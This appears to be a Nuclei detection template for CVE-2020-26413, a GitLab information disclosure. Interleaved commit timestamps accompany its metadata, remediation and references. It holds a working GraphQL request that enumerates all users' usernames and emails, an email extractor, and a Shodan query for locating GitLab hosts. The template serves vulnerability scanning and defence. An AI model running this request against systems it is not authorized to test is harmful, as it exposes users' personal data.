2021-11-06 12:52:50 +00:00
id : CVE-2020-26413
info :
2023-02-01 16:36:59 +00:00
name : Gitlab CE/EE 13.4 - 13.6.2 - Information Disclosure
2021-11-06 14:48:27 +00:00
author : _0xf4n9x_,pikpikcu
2021-11-06 12:52:50 +00:00
severity : medium
2023-02-01 16:36:59 +00:00
description : GitLab CE and EE 13.4 through 13.6.2 is susceptible to Information disclosure via GraphQL. User email is visible. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2023-09-27 15:51:13 +00:00
impact : |
An attacker can gain unauthorized access to sensitive information.
2023-09-06 12:22:36 +00:00
remediation : |
Upgrade Gitlab CE/EE to version 13.6.3 or later.
2021-11-06 12:52:50 +00:00
reference :
- https://gitlab.com/gitlab-org/gitlab/-/issues/244275
- https://gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-26413.json
- https://nvd.nist.gov/vuln/detail/CVE-2020-26413
2023-07-11 19:49:27 +00:00
- https://hackerone.com/reports/972355
2021-11-06 17:09:47 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 5.3
2021-11-06 17:09:47 +00:00
cve-id : CVE-2020-26413
cwe-id : CWE-200
2024-01-14 13:49:27 +00:00
epss-score : 0.74714
epss-percentile : 0.9787
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*
2022-04-22 10:38:41 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : gitlab
product : gitlab
2023-09-06 12:22:36 +00:00
shodan-query : http.title:"GitLab"
2023-07-12 11:56:50 +00:00
tags : hackerone,cve,cve2020,gitlab,exposure,enum,graphql
2021-11-06 12:52:50 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-11-06 12:52:50 +00:00
- raw :
- |
POST /api/graphql HTTP/1.1
Host : {{Hostname}}
Content-Type : application/json
{
2021-11-06 17:06:37 +00:00
"query": "{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }" ,
"variables": null ,
"operationName": null
}
2021-11-06 12:52:50 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2021-11-06 17:06:37 +00:00
- '"username":'
- '"avatarUrl":'
- '"node":'
2021-11-06 12:52:50 +00:00
condition : and
- type : status
status :
- 200
2021-11-06 14:48:27 +00:00
extractors :
2021-11-06 17:06:37 +00:00
- type : json
json :
- '.data.users.edges[].node.email'
2023-07-11 19:49:27 +00:00
part : body
2023-12-29 09:30:44 +00:00
# digest: 490a0046304402202fc17d5ae353fc7eb4850788b3f56a36dd08b600bfcb2d738b89626f8ce81f7d02207423f92465d421a1cc2cb2e72ab455fb4ead2ffba421c08d6220381d74fdaa31:922c64590222798bb761d5b6d8e72950